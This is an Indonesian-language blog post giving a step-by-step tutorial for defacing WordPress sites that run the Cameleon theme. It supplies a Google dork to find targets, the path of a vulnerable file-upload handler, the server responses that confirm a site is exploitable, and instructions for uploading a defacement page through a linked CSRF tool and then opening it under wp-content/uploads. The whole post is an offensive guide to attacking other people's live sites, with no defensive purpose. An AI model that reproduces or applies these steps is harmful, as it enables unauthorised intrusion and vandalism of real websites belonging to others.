Tutorial Deface Metode Wp - Cameleon With CSRF

Hi sobat kali ini saya akan membagikan tutorial deface metode Wp-Cameleon.

Yukk Gasken
Dork: inurl:/wp-content/themes/cameleon/

Exploit: /wp-content/themes/cameleon/includes/fileuploader/upload_handler.php

Step by Step :

1. Kalian dorking dulu di google setelah kalian dorking pilih salah 1 web dan tambahkan exploit nya contoh.

https://target.com/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php

Nanti kalo vuln itu ada bacaan {"error":"No files were uploaded."} contoh gambar di bawah
Nah itu tanda nya Vuln next kita ke tools csrf nya (Klik Disini)

Untuk di bagian :
Url: Target kalian yang tadi error
Post file: kalian isi dengan qqfile

Nah nanti kalo vuln ada bacaan sukses {"success":true,"url":"http:\/\/target.com\/wp-content\/uploads\/2020\/02\/v111.html","path":"\/home3\/ccserve1\/public_html\/silvertrading\/wp-content\/uploads\/2020\/02"}

Nah itu tanda nya sukses

Langsung kita panggil akses nya. Cara nya gmna? gampang tinggal tambahin akses nya di belakang url

Contoh https://target.com/wp-content/uploads/tahun/bulan/nama sc kalian.html

Tahun sama Bulan nanti sesuaikan sama yang tadi tanda sukses itu tahun berapa dan bulan berapa.
Dan hasil nya ke pepes ea:v

Good Luck!!

Belum ada Komentar untuk "Tutorial Deface Metode Wp - Cameleon With CSRF"

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel